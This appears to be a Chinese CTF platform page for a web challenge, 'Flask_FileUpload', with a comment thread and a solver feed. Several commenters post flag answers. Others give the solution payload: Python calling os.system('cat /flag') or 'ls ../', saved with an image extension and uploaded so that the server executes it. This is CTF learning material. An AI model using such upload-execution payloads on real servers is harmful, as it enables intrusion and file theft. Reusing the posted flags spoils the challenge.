Flask_FileUploadWEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Lazzaro
一血奖励: 3金币
解  决: 12177
提  示:
描  述:
Flask_FileUpload
评论
xiaojiang8 2年前

flag{11c51e1f3eafdc6d3ce72e17be86bb4a}

回复 0

zhb8014 2年前

flag{4b5d037a2b7ad4c8c09c440b3f0e9bf1}

回复 1

Cranestand 2年前

建一个文本文档,里面写: import os //回车 os.system('cat /flag'),然后文件后缀改成.png或.jpg后上传

回复 1
sent 1年前

@15277305951 开f12,回显在注释里面

回复 0

15277305951 2年前

file uploaded successfully! 我上传得到这个

回复 1

旋转的牛蛙 2年前

注意换行

回复 0

storn 2年前

类似于文件包含,文件中的内容只要符合python语法,就可以执行。 建一个文本文档,里面写 import os os.system("cat /flag") 然后将文件后缀改为png,上传。 再然后去看源代码,里面有flag

回复 0

xuexixiaohao 2年前

import os os.system('cat /flag')

回复 0

khalil 2年前

flag{031da75ae4719a4e3cf3f6652dbc04ad}

回复 0

107zsm 2年前

import os os.system('ls ../') os.system('cat ../flag') 文件上传后,获取flag

回复 2

baianquanzu 2年前

查看网站源码,提示我们的图片会被python执行返回 其实这一题是利用flask搭建的网站,图片中包含python的查询语句会被执行

回复 0

baianquanzu 2年前

import os os.system('cat /flag')

回复 0

WriteUp

image
国家级划水运动员

3 金币

评分(20)

解题动态

19101309197 攻破了该题 5小时前
merrymu 攻破了该题 17小时前
李嘉欣a 攻破了该题 22小时前
2647941092 攻破了该题 1天前
ding0520 攻破了该题 1天前
123456abc 攻破了该题 1天前
wzl真帅 攻破了该题 1天前
zhuizhui 攻破了该题 2天前
dwx1583 攻破了该题 3天前
09fan 攻破了该题 4天前
qidianzhi 攻破了该题 4天前
完全解放乐山大佛 攻破了该题 7天前
2153586896 攻破了该题 7天前
15170340233 攻破了该题 7天前
大棕兔爸爸 攻破了该题 7天前
3387140384 攻破了该题 7天前
3189521274 攻破了该题 7天前
13037286214 攻破了该题 7天前
14779962569 攻破了该题 7天前
2022215744 攻破了该题 7天前
问题反馈